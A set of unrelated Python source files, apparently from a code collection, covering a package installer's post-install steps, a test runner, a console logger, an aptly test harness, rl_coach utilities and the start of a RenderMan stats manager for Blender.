replace_install_dir = packet.directory
elif packet.default_install_dir:
replace_install_dir = packet.default_install_dir
shim = shim.replace(
'<install-directory>', replace_install_dir).replace('<version>', packet.version)
shim_name = shim.split(
"\\")[-1].split('.')[0].replace('<version>', packet.version)
write(
f'Generating Shim For {shim_name}', 'cyan', metadata)
utils.generate_shim(
shim, shim_name, shim.split('.')[-1])
if packet.add_path:
replace_install_dir = ''
if packet.directory:
replace_install_dir = packet.directory
elif packet.default_install_dir:
replace_install_dir = packet.default_install_dir
write(
f'Appending "{packet.add_path.replace("<install-directory>", replace_install_dir)}" To PATH', 'bright_green', metadata)
utils.append_to_path(packet.add_path.replace(
'<install-directory>', replace_install_dir))
if packet.set_env:
if isinstance(packet.set_env, list):
for obj in packet.set_env:
name = obj['name']
replace_install_dir = ''
if packet.directory:
replace_install_dir = packet.directory
elif packet.default_install_dir:
replace_install_dir = packet.default_install_dir
write(
f'Setting Environment Variable {name}', 'bright_green', metadata)
write_verbose(
f'Setting Environment Variable {name} to {obj["value"].replace("<install-directory>", replace_install_dir)}', metadata)
log_info(
f'Setting Environment Variable {name} to {obj["value"].replace("<install-directory>", replace_install_dir)}', metadata.logfile)
set_environment_variable(
name, obj['value'].replace('<install-directory>', replace_install_dir))
else:
name = packet.set_env['name']
replace_install_dir = ''
if packet.directory:
replace_install_dir = packet.directory
elif packet.default_install_dir:
replace_install_dir = packet.default_install_dir
write(
f'Setting Environment Variable {name}', 'bright_green', metadata)
write_verbose(
f'Setting Environment Variable {name} to {packet.set_env["value"].replace("<install-directory>", replace_install_dir)}', metadata)
log_info(
f'Setting Environment Variable {name} to {packet.set_env["value"].replace("<install-directory>", replace_install_dir)}', metadata.logfile)
set_environment_variable(
name, packet.set_env['value'].replace('<install-directory>', replace_install_dir))
write_verbose(
'Creating Final Snapshot Of Environment Keys', metadata)
final_snap = get_environment_keys()
if final_snap.env_length > start_snap.env_length or final_snap.sys_length > start_snap.sys_length or changes_environment:
write('The PATH environment variable has changed. Run `refreshenv` to refresh your environment variables.',
'bright_green', metadata)
write_verbose(
'Successfully Verified Installation Of Packages', metadata)
write(
f'Successfully Installed {packet.display_name}', 'bright_magenta', metadata)
log_info(
f'Successfully Installed {packet.display_name}', metadata.logfile)
utils.register_package_success(
packet, install_directory, metadata)
if metadata.reduce_package:
os.remove(path)
try:
os.remove(
Rf'{tempfile.gettempdir()}\downloadcache.pickle')
except:
pass
log_info(
'Successfully Cleaned Up Installer From Temporary Directory And DownloadCache', metadata.logfile)
write('Successfully Cleaned Up Installer From Temp Directory...',
'bright_green', metadata)
write_verbose(
'Dependency successfully Installed.', metadata)
log_info('Dependency successfully Installed.',
metadata.logfile)
else:
os._exit(1)
|
tester.py
|
import asyncio
import time
from threading import Thread
class Test:
def __init__(self, func, ignored_exception, *args):
self.func = func
self.value = args
self.ignored_exception = ignored_exception
self.completed = None
self.time = 0
self.result = None
self.exception = None
async def run(self):
start = time.time()
try:
self.result = await self.func()
except Exception as e:
self.exception = e.__class__.__name__ + ": " + str(e)
if self.ignored_exception and isinstance(e, self.ignored_exception):
self.exception = None
self.time = (time.time() - start) * 1000
self.completed = (
any(self.result == val for val in self.value) and not self.exception
)
class Tester:
def __init__(self, gather: bool = True):
self.tests = []
self.gather = gather
self._thread = Thread(target=self._handle_ui)
def _handle_ui(self):
done_tests = []
while True:
done = True
for test in self.tests:
if test in done_tests:
continue
flush = False
if test.completed:
status_string = f"✅ Passed. {test.time}ms"
elif test.completed is None:
flush = True
done = False
status_string = "🕒 Running.."
else:
status_string = f"❌ Failed. {test.time}ms"
if flush:
print(
f"\rRunning test '{test.func.__name__}' - {status_string}",
end="",
flush=True,
)
else:
done_tests.append(test)
print(f"\rRunning test '{test.func.__name__}' - {status_string}")
if done:
break
time.sleep(0.05)
failed = [x for x in self.tests if not x.completed]
failed_str = "\n".join(
[
f"Test '{x.func.__name__}' failed, "
+ (
f"{x.exception} was raised."
if x.exception
else f"expected {x.value}, got {x.result}."
)
for x in failed
]
)
print(
f"---------------\nDone, ({len(self.tests) - len(failed)}/{len(self.tests)}) tests have passed.\n"
+ failed_str
)
def add_test(self, function, *args, ignored_exception=None):
self.tests.append(Test(function, ignored_exception, *args))
async def run(self):
print(f"Running {len(self.tests)} test(s).\n---------------")
self._thread.start()
if self.gather:
await asyncio.gather(*[x.run() for x in self.tests])
return
for x in self.tests:
await x.run()
|
log.py
|
# coding=utf8
from datetime import datetime
from Queue import Queue, Empty
from threading import Thread, Lock
from threading import Event as TEvent
import hashlib
import sys,traceback, re
_logger = None
def sstr(obj):
""" converts any object to str, if necessary encodes unicode chars """
try:
return str(obj)
except UnicodeEncodeError:
return unicode(obj).encode('utf-8')
class Logtype(object):
DEBUG = 1
INFO = 2
WARNING = 3
ERROR = 4
NONE = 99
class CColors(object):
DEBUG = '\033[92m'
INFO = '\033[92m'
WARNING = '\033[93m'
ERROR = '\033[91m'
ENDC = '\033[0m'
class Loggable(object):
"""Inherit and set log_id to have a log function in any class"""
def __init__(self):
self.log_id = "anonymous"
def log(self, msg, logtype = Logtype.NONE):
Logger.log(self.log_id, msg, logtype)
def log_exception(self, msg="Exception occured.", logtype = Logtype.ERROR, exc_info=None):
Logger.log_exception(self.log_id, msg, logtype, exc_info)
class Logger(object):
"""Asynchronous logger that prints to command line"""
def __init__(self, verbose=True):
self.verbose = verbose
self.pending_messages = Queue()
self._stop = TEvent()
self.sendercolors = dict()
self.worker_thread = Thread(target=self.work,name = "Logging thread")
self.last_date = datetime.now().strftime('%Y-%m-%d')
self.printlock = Lock()
@staticmethod
def start(verbose=True):
global _logger
_logger = Logger(verbose)
_logger.worker_thread.start()
@staticmethod
def log(senderid,msg,logtype=Logtype.NONE):
global _logger
if _logger == None:
raise(RuntimeError("Logger is not initialized"))
if _logger.verbose or (logtype != Logtype.NONE and logtype != Logtype.DEBUG):
_logger.pending_messages.put((sstr(senderid),sstr(msg),logtype))
@staticmethod
def log_exception(senderid,msg="Exception occured.",logtype=Logtype.ERROR,exc_info=None):
global _logger
if _logger == None:
raise(RuntimeError("Logger is not initialized"))
if exc_info == None:
exc_type, exc_value, exc_traceback = sys.exc_info()
else:
exc_type, exc_value, exc_traceback = exc_info
estr = ""
if _logger.verbose:
estr = estr.join(traceback.format_exception(exc_type, exc_value, exc_traceback))
else:
estr = estr.join(traceback.format_exception_only(exc_type, exc_value))
_logger.pending_messages.put((sstr(senderid),sstr(msg) + "\n" + sstr(estr),logtype))
@staticmethod
def stop():
global _logger
if _logger == None:
raise(RuntimeError("Logger is not initialized"))
_logger._stop.set()
@staticmethod
def get_thread():
global _logger
return _logger.worker_thread
@staticmethod
def get_printlock():
return _logger.printlock
@staticmethod
def get_pending_messages():
return _logger.pending_messages
def printmsg(self,senderid,msg,logtype=Logtype.NONE):
current_date = datetime.now().strftime('%Y-%m-%d')
if current_date != self.last_date:
print ("--- " + current_date + " ---")
self.last_date = current_date
timestr = datetime.now().strftime('%H:%M:%S')
if (logtype == Logtype.DEBUG):
timestr = CColors.DEBUG + timestr + CColors.ENDC
elif (logtype == Logtype.INFO):
timestr = CColors.INFO + timestr + CColors.ENDC
elif (logtype == Logtype.WARNING):
timestr = CColors.WARNING + timestr + CColors.ENDC
elif (logtype == Logtype.ERROR):
timestr = CColors.ERROR + timestr + CColors.ENDC
if not(senderid in self.sendercolors):
m = hashlib.md5()
m.update(senderid)
colornum = (int(m.hexdigest()[:1],16) % 6) + 4
self.sendercolors[senderid] = '\033[9' + str(colornum) + 'm'
short_senderid = senderid.rpartition("__")[2]
header = timestr + " [" + self.sendercolors[senderid] + short_senderid + CColors.ENDC + "] "
body = re.sub(r'\n', "\n" + ''.join([" " for x in range(9)]),msg)
print (header + body)
def work(self):
while not self.pending_messages.empty() or not self._stop.is_set():
if self.printlock.acquire(False):
try:
senderid, msg, logtype = self.pending_messages.get(block=True, timeout = 1)
self.printmsg(senderid,msg,logtype)
self.pending_messages.task_done()
except Empty:
pass
finally:
self.printlock.release()
|
lib.py
|
"""
Test library.
"""
import difflib
import inspect
import json
import subprocess
import os
import posixpath
import shlex
import shutil
import string
import threading
import urllib
#import time
import pprint
import SocketServer
import SimpleHTTPServer
class ThreadedTCPServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer):
pass
class FileHTTPServerRequestHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
def translate_path(self, path):
"""Translate a /-separated PATH to the local filename syntax.
Components that mean special things to the local file system
(e.g. drive or directory names) are ignored. (XXX They should
probably be diagnosed.)
"""
# abandon query parameters
path = path.split('?', 1)[0]
path = path.split('#', 1)[0]
path = posixpath.normpath(urllib.unquote(path))
words = path.split('/')
words = filter(None, words)
path = self.rootPath
for word in words:
drive, word = os.path.splitdrive(word)
head, word = os.path.split(word)
if word in (os.curdir, os.pardir):
continue
path = os.path.join(path, word)
return path
def log_message(self, format, *args):
pass
class BaseTest(object):
"""
Base class for all tests.
"""
longTest = False
fixturePool = False
fixturePoolCopy = False
fixtureDB = False
fixtureGpg = False
fixtureWebServer = False
expectedCode = 0
configFile = {
"rootDir": "%s/.aptly" % os.environ["HOME"],
"downloadConcurrency": 4,
"downloadSpeedLimit": 0,
"architectures": [],
"dependencyFollowSuggests": False,
"dependencyFollowRecommends": False,
"dependencyFollowAllVariants": False,
"dependencyFollowSource": False,
"gpgDisableVerify": False,
"gpgDisableSign": False,
"ppaDistributorID": "ubuntu",
"ppaCodename": "",
}
configOverride = {}
environmentOverride = {}
fixtureDBDir = os.path.join(os.environ["HOME"], "aptly-fixture-db")
fixturePoolDir = os.path.join(os.environ["HOME"], "aptly-fixture-pool")
outputMatchPrepare = None
captureResults = False
def test(self):
self.prepare()
self.run()
self.check()
def prepare_remove_all(self):
if os.path.exists(os.path.join(os.environ["HOME"], ".aptly")):
shutil.rmtree(os.path.join(os.environ["HOME"], ".aptly"))
if os.path.exists(os.path.join(os.environ["HOME"], ".aptly.conf")):
os.remove(os.path.join(os.environ["HOME"], ".aptly.conf"))
if os.path.exists(os.path.join(os.environ["HOME"], ".gnupg", "aptlytest.gpg")):
os.remove(os.path.join(os.environ["HOME"], ".gnupg", "aptlytest.gpg"))
def prepare_default_config(self):
cfg = self.configFile.copy()
cfg.update(**self.configOverride)
f = open(os.path.join(os.environ["HOME"], ".aptly.conf"), "w")
f.write(json.dumps(cfg))
f.close()
def fixture_available(self):
if self.fixturePool and not os.path.exists(self.fixturePoolDir):
return False
if self.fixtureDB and not os.path.exists(self.fixtureDBDir):
return False
return True
def prepare_fixture(self):
if self.fixturePool:
#start = time.time()
os.makedirs(os.path.join(os.environ["HOME"], ".aptly"), 0755)
os.symlink(self.fixturePoolDir, os.path.join(os.environ["HOME"], ".aptly", "pool"))
#print "FIXTURE POOL: %.2f" % (time.time()-start)
if self.fixturePoolCopy:
os.makedirs(os.path.join(os.environ["HOME"], ".aptly"), 0755)
shutil.copytree(self.fixturePoolDir, os.path.join(os.environ["HOME"], ".aptly", "pool"), ignore=shutil.ignore_patterns(".git"))
if self.fixtureDB:
#start = time.time()
shutil.copytree(self.fixtureDBDir, os.path.join(os.environ["HOME"], ".aptly", "db"))
#print "FIXTURE DB: %.2f" % (time.time()-start)
if self.fixtureWebServer:
self.webServerUrl = self.start_webserver(os.path.join(os.path.dirname(inspect.getsourcefile(self.__class__)),
self.fixtureWebServer))
if self.fixtureGpg:
self.run_cmd(["gpg", "--no-default-keyring", "--trust-model", "always", "--batch", "--keyring", "aptlytest.gpg", "--import",
os.path.join(os.path.dirname(inspect.getsourcefile(BaseTest)), "files", "debian-archive-keyring.gpg"),
os.path.join(os.path.dirname(inspect.getsourcefile(BaseTest)), "files", "launchpad.key"),
os.path.join(os.path.dirname(inspect.getsourcefile(BaseTest)), "files", "flat.key"),
os.path.join(os.path.dirname(inspect.getsourcefile(BaseTest)), "files", "jenkins.key")])
if hasattr(self, "fixtureCmds"):
for cmd in self.fixtureCmds:
self.run_cmd(cmd)
def run(self):
self.output = self.output_processor(self.run_cmd(self.runCmd, self.expectedCode))
def _start_process(self, command, stderr=subprocess.STDOUT, stdout=None):
if not hasattr(command, "__iter__"):
params = {
'files': os.path.join(os.path.dirname(inspect.getsourcefile(BaseTest)), "files"),
'udebs': os.path.join(os.path.dirname(inspect.getsourcefile(BaseTest)), "udebs"),
'testfiles': os.path.join(os.path.dirname(inspect.getsourcefile(self.__class__)), self.__class__.__name__),
'aptlyroot': os.path.join(os.environ["HOME"], ".aptly"),
}
if self.fixtureWebServer:
params['url'] = self.webServerUrl
command = string.Template(command).substitute(params)
command = shlex.split(command)
environ = os.environ.copy()
environ["LC_ALL"] = "C"
environ.update(self.environmentOverride)
return subprocess.Popen(command, stderr=stderr, stdout=stdout, env=environ)
def run_cmd(self, command, expected_code=0):
try:
#start = time.time()
proc = self._start_process(command, stdout=subprocess.PIPE)
output, _ = proc.communicate()
#print "CMD %s: %.2f" % (" ".join(command), time.time()-start)
if proc.returncode != expected_code:
raise Exception("exit code %d != %d (output: %s)" % (proc.returncode, expected_code, output))
return output
except Exception, e:
raise Exception("Running command %s failed: %s" % (command, str(e)))
def gold_processor(self, gold):
return gold
def output_processor(self, output):
return output
def expand_environ(self, gold):
return string.Template(gold).substitute(os.environ)
def get_gold_filename(self, gold_name="gold"):
return os.path.join(os.path.dirname(inspect.getsourcefile(self.__class__)), self.__class__.__name__ + "_" + gold_name)
def get_gold(self, gold_name="gold"):
return self.gold_processor(open(self.get_gold_filename(gold_name), "r").read())
def check_output(self):
try:
self.verify_match(self.get_gold(), self.output, match_prepare=self.outputMatchPrepare)
except:
if self.captureResults:
if self.outputMatchPrepare is not None:
self.output = self.outputMatchPrepare(self.output)
with open(self.get_gold_filename(), "w") as f:
f.write(self.output)
else:
raise
def check_cmd_output(self, command, gold_name, match_prepare=None, expected_code=0):
output = self.run_cmd(command, expected_code=expected_code)
try:
self.verify_match(self.get_gold(gold_name), output, match_prepare)
except:
if self.captureResults:
if match_prepare is not None:
output = match_prepare(output)
with open(self.get_gold_filename(gold_name), "w") as f:
f.write(output)
else:
raise
def read_file(self, path):
with open(os.path.join(os.environ["HOME"], ".aptly", path), "r") as f:
return f.read()
def delete_file(self, path):
os.unlink(os.path.join(os.environ["HOME"], ".aptly", path))
def check_file_contents(self, path, gold_name, match_prepare=None):
contents = self.read_file(path)
try:
self.verify_match(self.get_gold(gold_name), contents, match_prepare=match_prepare)
except:
if self.captureResults:
with open(self.get_gold_filename(gold_name), "w") as f:
f.write(contents)
else:
raise
def check_file(self):
contents = open(self.checkedFile, "r").read()
try:
self.verify_match(self.get_gold(), contents)
except:
if self.captureResults:
with open(self.get_gold_filename(), "w") as f:
f.write(contents)
else:
raise
def check_exists(self, path):
if not os.path.exists(os.path.join(os.environ["HOME"], ".aptly", path)):
raise Exception("path %s doesn't exist" % (path, ))
def check_not_exists(self, path):
if os.path.exists(os.path.join(os.environ["HOME"], ".aptly", path)):
raise Exception("path %s exists" % (path, ))
def check_file_not_empty(self, path):
if os.stat(os.path.join(os.environ["HOME"], ".aptly", path))[6] == 0:
raise Exception("file %s is empty" % (path, ))
def check_equal(self, a, b):
if a != b:
self.verify_match(a, b, match_prepare=pprint.pformat)
def verify_match(self, a, b, match_prepare=None):
if match_prepare is not None:
a = match_prepare(a)
b = match_prepare(b)
if a != b:
diff = "".join(difflib.unified_diff([l + "\n" for l in a.split("\n")], [l + "\n" for l in b.split("\n")]))
raise Exception("content doesn't match:\n" + diff + "\n")
check = check_output
def prepare(self):
self.prepare_remove_all()
self.prepare_default_config()
self.prepare_fixture()
def start_webserver(self, directory):
FileHTTPServerRequestHandler.rootPath = directory
self.webserver = ThreadedTCPServer(("localhost", 0), FileHTTPServerRequestHandler)
server_thread = threading.Thread(target=self.webserver.serve_forever)
server_thread.daemon = True
server_thread.start()
return "http://%s:%d/" % self.webserver.server_address
def shutdown(self):
if hasattr(self, 'webserver'):
self.shutdown_webserver()
def shutdown_webserver(self):
self.webserver.shutdown()
@classmethod
def shutdown_class(cls):
pass
|
utils.py
|
#
# Copyright (c) 2017 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import importlib
import importlib.util
import inspect
import os
import re
import signal
import sys
import threading
import time
import traceback
from multiprocessing import Manager
from subprocess import Popen
from typing import List, Tuple, Union
import atexit
import numpy as np
from rl_coach.logger import screen
killed_processes = []
eps = np.finfo(np.float32).eps
def lower_under_to_upper(s):
s = s.replace('_', ' ')
s = s.title()
return s.replace(' ', '')
def get_base_dir():
return os.path.dirname(os.path.realpath(__file__))
def list_all_presets():
presets_path = os.path.join(get_base_dir(), 'presets')
return [f.split('.')[0] for f in os.listdir(presets_path) if f.endswith('.py') and f != '__init__.py']
def list_all_classes_in_module(module):
return [k for k, v in inspect.getmembers(module, inspect.isclass) if v.__module__ == module.__name__]
def parse_bool(value):
return {'true': True, 'false': False}.get(value.strip().lower(), value)
def convert_to_ascii(data):
import collections
if isinstance(data, basestring):
return parse_bool(str(data))
elif isinstance(data, collections.Mapping):
return dict(map(convert_to_ascii, data.iteritems()))
elif isinstance(data, collections.Iterable):
return type(data)(map(convert_to_ascii, data))
else:
return data
def break_file_path(path):
base = os.path.splitext(os.path.basename(path))[0]
extension = os.path.splitext(os.path.basename(path))[1]
dir = os.path.dirname(path)
return dir, base, extension
def is_empty(str):
return str == 0 or len(str.replace("'", "").replace("\"", "")) == 0
def path_is_valid_dir(path):
return os.path.isdir(path)
def remove_suffix(name, suffix_start):
for s in suffix_start:
split = name.find(s)
if split != -1:
name = name[:split]
return name
def parse_int(value):
import ast
try:
int_value = int(value)
return int_value if int_value == value else value
except:
pass
try:
return ast.literal_eval(value)
except:
return value
def set_gpu(gpu_id):
os.environ['CUDA_VISIBLE_DEVICES'] = str(gpu_id)
def set_cpu():
set_gpu("")
# dictionary to class
class DictToClass(object):
def __init__(self, data):
for name, value in data.iteritems():
setattr(self, name, self._wrap(value))
def _wrap(self, value):
if isinstance(value, (tuple, list, set, frozenset)):
return type(value)([self._wrap(v) for v in value])
else:
return DictToClass(value) if isinstance(value, dict) else value
# class to dictionary
def ClassToDict(x):
# return dict((key, getattr(x, key)) for key in dir(x) if key not in dir(x.__class__))
dictionary = x.__dict__
return {key: dictionary[key] for key in dictionary.keys() if not key.startswith('__')}
def cmd_line_run(result, run_cmd, id=-1):
p = Popen(run_cmd, shell=True, executable="bash")
while result[0] is None or result[0] == [None]:
if id in killed_processes:
p.kill()
result[0] = p.poll()
def threaded_cmd_line_run(run_cmd, id=-1):
runThread = []
result = [[None]]
try:
params = (result, run_cmd, id)
runThread = threading.Thread(name='runThread', target=cmd_line_run, args=params)
runThread.daemon = True
runThread.start()
except:
runThread.join()
return result
class Signal(object):
"""
Stores a stream of values and provides methods like get_mean and get_max
which returns the statistics about accumulated values.
"""
def __init__(self, name):
self.name = name
self.sample_count = 0
self.values = []
def reset(self):
self.sample_count = 0
self.values = []
def add_sample(self, sample):
"""
:param sample: either a single value or an array of values
"""
self.values.append(sample)
def _get_values(self):
if type(self.values[0]) == np.ndarray:
return np.concatenate(self.values)
else:
return self.values
def get_last_value(self):
if len(self.values) == 0:
return np.nan
else:
return self._get_values()[-1]
def get_mean(self):
if len(self.values) == 0:
return ''
return np.mean(self._get_values())
def get_max(self):
if len(self.values) == 0:
return ''
return np.max(self._get_values())
def get_min(self):
if len(self.values) == 0:
return ''
return np.min(self._get_values())
def get_stdev(self):
if len(self.values) == 0:
return ''
return np.std(self._get_values())
def force_list(var):
if isinstance(var, list):
return var
else:
return [var]
def squeeze_list(var):
if type(var) == list and len(var) == 1:
return var[0]
else:
return var
def get_open_port():
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(("", 0))
s.listen(1)
port = s.getsockname()[1]
s.close()
return port
class timeout:
def __init__(self, seconds=1, error_message='Timeout'):
self.seconds = seconds
self.error_message = error_message
def _handle_timeout(self, signum, frame):
raise TimeoutError(self.error_message)
def __enter__(self):
signal.signal(signal.SIGALRM, self._handle_timeout)
signal.alarm(self.seconds)
def __exit__(self, type, value, traceback):
signal.alarm(0)
def switch_axes_order(observation, from_type='channels_first', to_type='channels_last'):
"""
transpose an observation axes from channels_first to channels_last or vice versa
:param observation: a numpy array
:param from_type: can be 'channels_first' or 'channels_last'
:param to_type: can be 'channels_first' or 'channels_last'
:return: a new observation with the requested axes order
"""
if from_type == to_type or len(observation.shape) == 1:
return observation
assert 2 <= len(observation.shape) <= 3, 'num axes of an observation must be 2 for a vector or 3 for an image'
assert type(observation) == np.ndarray, 'observation must be a numpy array'
if len(observation.shape) == 3:
if from_type == 'channels_first' and to_type == 'channels_last':
return np.transpose(observation, (1, 2, 0))
elif from_type == 'channels_last' and to_type == 'channels_first':
return np.transpose(observation, (2, 0, 1))
else:
return np.transpose(observation, (1, 0))
def stack_observation(curr_stack, observation, stack_size):
"""
Adds a new observation to an existing stack of observations from previous time-steps.
:param curr_stack: The current observations stack.
:param observation: The new observation
:param stack_size: The required stack size
:return: The updated observation stack
"""
if curr_stack == []:
# starting an episode
curr_stack = np.vstack(np.expand_dims([observation] * stack_size, 0))
curr_stack = switch_axes_order(curr_stack, from_type='channels_first', to_type='channels_last')
else:
curr_stack = np.append(curr_stack, np.expand_dims(np.squeeze(observation), axis=-1), axis=-1)
curr_stack = np.delete(curr_stack, 0, -1)
return curr_stack
def call_method_for_all(instances: List, method: str, args=[], kwargs={}) -> List:
"""
Calls the same function for all the class instances in the group
:param instances: a list of class instances to apply the method on
:param method: the name of the function to be called
:param args: the positional parameters of the method
:param kwargs: the named parameters of the method
:return: a list of the returns values for all the instances
"""
result = []
if not isinstance(args, list):
args = [args]
sub_methods = method.split('.') # we allow calling an internal method such as "as_level_manager.train"
for instance in instances:
sub_instance = instance
for sub_method in sub_methods:
if not hasattr(sub_instance, sub_method):
raise ValueError("The requested instance method {} does not exist for {}"
.format(sub_method, '.'.join([str(instance.__class__.__name__)] + sub_methods)))
sub_instance = getattr(sub_instance, sub_method)
result.append(sub_instance(*args, **kwargs))
return result
def set_member_values_for_all(instances: List, member: str, val) -> None:
"""
Calls the same function for all the class instances in the group
:param instances: a list of class instances to apply the method on
:param member: the name of the member to be changed
:param val: the new value to assign
:return: None
"""
for instance in instances:
if not hasattr(instance, member):
raise ValueError("The requested instance member does not exist")
setattr(instance, member, val)
def short_dynamic_import(module_path_and_attribute: str, ignore_module_case: bool=False):
"""
Import by "path:attribute"
:param module_path_and_attribute: a path to a python file (using dots to separate dirs), followed by a ":" and
an attribute name to import from the path
:return: the requested attribute
"""
if '/' in module_path_and_attribute:
"""
Imports a class from a module using the full path of the module. The path should be given as:
<full absolute module path with / including .py>:<class name to import>
And this will be the same as doing "from <full absolute module path> import <class name to import>"
"""
return dynamic_import_from_full_path(*module_path_and_attribute.split(':'),
ignore_module_case=ignore_module_case)
else:
"""
Imports a class from a module using the relative path of the module. The path should be given as:
<full absolute module path with . and not including .py>:<class name to import>
And this will be the same as doing "from <full relative module path> import <class name to import>"
"""
return dynamic_import(*module_path_and_attribute.split(':'),
ignore_module_case=ignore_module_case)
def dynamic_import(module_path: str, class_name: str, ignore_module_case: bool=False):
if ignore_module_case:
module_name = module_path.split(".")[-1]
available_modules = os.listdir(os.path.dirname(module_path.replace('.', '/')))
for module in available_modules:
curr_module_ext = module.split('.')[-1].lower()
curr_module_name = module.split('.')[0]
if curr_module_ext == "py" and curr_module_name.lower() == module_name.lower():
module_path = '.'.join(module_path.split(".")[:-1] + [curr_module_name])
module = importlib.import_module(module_path)
class_ref = getattr(module, class_name)
return class_ref
def dynamic_import_from_full_path(module_path: str, class_name: str, ignore_module_case: bool=False):
if ignore_module_case:
module_name = module_path.split("/")[-1]
available_modules = os.listdir(os.path.dirname(module_path))
for module in available_modules:
curr_module_ext = module.split('.')[-1].lower()
curr_module_name = module.split('.')[0]
if curr_module_ext == "py" and curr_module_name.lower() == module_name.lower():
module_path = '.'.join(module_path.split("/")[:-1] + [curr_module_name])
spec = importlib.util.spec_from_file_location("module", module_path)
module = importlib.util.module_from_spec(spec)
spec.loader.exec_module(module)
class_ref = getattr(module, class_name)
return class_ref
def dynamic_import_and_instantiate_module_from_params(module_parameters, path=None, positional_args=[],
extra_kwargs={}):
"""
A function dedicated for coach modules like memory, exploration policy, etc.
Given the module parameters, it imports it and instantiates it.
:param module_parameters:
:return:
"""
import inspect
if path is None:
path = module_parameters.path
module = short_dynamic_import(path)
args = set(inspect.getfullargspec(module).args).intersection(module_parameters.__dict__)
args = {k: module_parameters.__dict__[k] for k in args}
args = {**args, **extra_kwargs}
return short_dynamic_import(path)(*positional_args, **args)
def last_sample(state):
"""
given a batch of states, return the last sample of the batch with length 1
batch axis.
"""
return {
k: np.expand_dims(v[-1], 0)
for k, v in state.items()
}
def get_all_subclasses(cls):
if len(cls.__subclasses__()) == 0:
return []
ret = []
for drv in cls.__subclasses__():
ret.append(drv)
ret.extend(get_all_subclasses(drv))
return ret
class SharedMemoryScratchPad(object):
def __init__(self):
self.dict = {}
def add(self, key, value):
self.dict[key] = value
def get(self, key, timeout=30):
start_time = time.time()
timeout_passed = False
while key not in self.dict and not timeout_passed:
time.sleep(0.1)
timeout_passed = (time.time() - start_time) > timeout
if timeout_passed:
return None
return self.dict[key]
def internal_call(self, key, func, args: Tuple):
if type(args) != tuple:
args = (args,)
return getattr(self.dict[key], func)(*args)
class Timer(object):
def __init__(self, prefix):
self.prefix = prefix
def __enter__(self):
self.start = time.time()
def __exit__(self, type, value, traceback):
print(self.prefix, time.time() - self.start)
class ReaderWriterLock(object):
def __init__(self):
# self.num_readers_lock = Manager().Lock() # GK
# self.writers_lock = Manager().Lock() # GK
self.num_readers = 0
self.now_writing = False
def some_worker_is_reading(self):
return self.num_readers > 0
def some_worker_is_writing(self):
return self.now_writing is True
def lock_writing_and_reading(self):
# self.writers_lock.acquire() # first things first - block all other writers #GK
self.now_writing = True # block new readers who haven't started reading yet
while self.some_worker_is_reading(): # let existing readers finish their homework
time.sleep(0.05)
def release_writing_and_reading(self):
self.now_writing = False # release readers - guarantee no readers starvation
# self.writers_lock.release() # release writers #GK
def lock_writing(self):
while self.now_writing:
time.sleep(0.05)
# self.num_readers_lock.acquire() #GK
self.num_readers += 1
# self.num_readers_lock.release() #GK
def release_writing(self):
# self.num_readers_lock.acquire() #GK
self.num_readers -= 1
# self.num_readers_lock.release() #GK
class ProgressBar(object):
def __init__(self, max_value):
self.start_time = time.time()
self.max_value = max_value
self.current_value = 0
def update(self, current_value, additional_info=""):
self.current_value = current_value
percentage = int((100 * current_value) / self.max_value)
sys.stdout.write("\rProgress: ({}/{}) Time: {} sec {}%|{}{}| {}"
.format(current_value, self.max_value,
round(time.time() - self.start_time, 2),
percentage, '#' * int(percentage / 10),
' ' * (10 - int(percentage / 10)),
additional_info))
sys.stdout.flush()
def close(self):
print("")
def start_shell_command_and_wait(command):
p = Popen(command, shell=True, preexec_fn=os.setsid)
def cleanup():
os.killpg(os.getpgid(p.pid), 15)
atexit.register(cleanup)
p.wait()
atexit.unregister(cleanup)
def indent_string(string):
return '\t' + string.replace('\n', '\n\t')
def get_latest_checkpoint(checkpoint_dir: str, checkpoint_prefix: str, checkpoint_file_extension: str) -> str:
latest_checkpoint_id = -1
latest_checkpoint = ''
# get all checkpoint files
for fname in os.listdir(checkpoint_dir):
path = os.path.join(checkpoint_dir, fname)
if os.path.isdir(path) or fname.split('.')[-1] != checkpoint_file_extension or checkpoint_prefix not in fname:
continue
checkpoint_id = int(fname.split('_')[0])
if checkpoint_id > latest_checkpoint_id:
latest_checkpoint = fname
latest_checkpoint_id = checkpoint_id
return latest_checkpoint
|
rman_stats.py
|
import re
import os
import sys
import json
import bpy
import rman
import threading
import time
from collections import OrderedDict
import rman_utils.stats_config.core as stcore
from . import rman_render
from .rfb_utils import prefs_utils
from .rfb_logger import rfb_log
__oneK2__ = 1024.0*1024.0
__RFB_STATS_MANAGER__ = None
__LIVE_METRICS__ = [
["/system.processMemory", "Memory"],
["/rman/raytracing.numRays", "Rays/Sec"],
["/rman/renderer@progress", None],
['/rman@iterationComplete', None],
["/rman.timeToFirstRaytrace", "First Ray"],
["/rman.timeToFirstPixel", "First Pixel"],
["/rman.timeToFirstIteration", "First Iteration"],
]
class RfBBaseMetric(object):
def __init__(self, key, label):
self.key = key
self.label = label
class RfBStatsManager(object):
def __init__(self, rman_render):
global __RFB_STATS_MANAGER__
global __LIVE_METRICS__
self.mgr = None
self.create_stats_manager()
self.render_live_stats = OrderedDict()
self.render_stats_names = OrderedDict()
self._prevTotalRays = 0
self._progress = 0
self._prevTotalRaysValid = True
for name,label in __LIVE_METRICS__:
if label:
self.render_live_stats[label] = '--'
self.render_stats_names[name] = label
self.export_stat_label = ''
self.export_stat_progress = 0.0
self._integrator = 'PxrPathTracer'
self._maxSamples = 0
self._iterations = 0
self._decidither = 0
self._res_mult = 0.0
self.web_socket_enabled = False
self.boot_strap_thread = None
self.boot_strap_thread_kill = False
# roz objects
self.rman_stats_session_name = "RfB Stats Session"
self.rman_stats_session = None
self.rman_stats_session_config = None
self.rman_render = rman_render
self.init_stats_session()
self.create_stats_manager()
__RFB_STATS_MANAGER__ = self
def __del__(self):
if self.boot_strap_thread.is_alive():
self.boot_strap_thread_kill = True
self.boot_strap_thread.join()
@classmethod
def get_stats_manager(self):
global __RFB_STATS_MANAGER__
return __RFB_STATS_MANAGER__
def reset(self):
